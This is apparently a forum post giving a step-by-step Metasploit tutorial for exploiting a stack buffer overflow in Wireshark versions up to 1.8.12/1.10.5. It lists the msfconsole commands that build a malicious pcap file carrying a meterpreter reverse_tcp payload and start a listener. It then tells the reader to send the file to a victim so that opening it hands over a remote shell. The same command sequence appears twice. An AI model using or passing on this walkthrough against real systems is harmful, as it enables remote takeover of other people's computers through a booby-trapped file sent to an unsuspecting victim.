RayOwns
Network Reconnaissance Specialist
LEVEL 1
400 XP
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 by generating a malicious file.)
Exploit Targets
Wireshark <= 1.8.12/1.10.5
Requirement
Attacker: kali Linux
Victim PC: Windows XP SP 3
Open Kali terminal type msfconsole
Now type use exploit/windows/fileformat/wireshark_mpeg_overflow
msf exploit ([color=rgb(128,]wireshark_mpeg_overflow)>set payload windows/meterpreter/reverse_tcp[/color]
msf exploit ([color=rgb(128,]wireshark_mpeg_overflow)>set lhost 192.168.1.7 (IP of Local Host)[/color]
msf exploit ([color=rgb(128,]wireshark_mpeg_overflow)>set target 1[/color]
msf exploit ([color=rgb(128,]wireshark_mpeg_overflow)>exploit[/color]
After we successfully generate the malicious pcap File, it will stored on your local computer
/root/.msf4/local/mpeg_overflow.pcap
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.7
exploit
Now send your mpeg_overflow.pcap files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer
Exploit Targets
Wireshark <= 1.8.12/1.10.5
Requirement
Attacker: kali Linux
Victim PC: Windows XP SP 3
Open Kali terminal type msfconsole
data:image/s3,"s3://crabby-images/1850f/1850fe545bf34be1e25ae36d71263699e4a50197" alt="1.png"
Now type use exploit/windows/fileformat/wireshark_mpeg_overflow
msf exploit ([color=rgb(128,]wireshark_mpeg_overflow)>set payload windows/meterpreter/reverse_tcp[/color]
msf exploit ([color=rgb(128,]wireshark_mpeg_overflow)>set lhost 192.168.1.7 (IP of Local Host)[/color]
msf exploit ([color=rgb(128,]wireshark_mpeg_overflow)>set target 1[/color]
msf exploit ([color=rgb(128,]wireshark_mpeg_overflow)>exploit[/color]
data:image/s3,"s3://crabby-images/6bd43/6bd43439fb867f0554f809914b79b892ea514ebb" alt="2.png"
After we successfully generate the malicious pcap File, it will stored on your local computer
/root/.msf4/local/mpeg_overflow.pcap
data:image/s3,"s3://crabby-images/9a121/9a121662244e949201634be3572127b12a9c5ef2" alt="3.png"
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.7
exploit
Now send your mpeg_overflow.pcap files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer
data:image/s3,"s3://crabby-images/861f9/861f964425a04b580b896296db1f19e4c9c465e8" alt="4.png"
data:image/s3,"s3://crabby-images/33c26/33c262f960e43e0b1377fa3ec4cbc689d5ef63da" alt="5.png"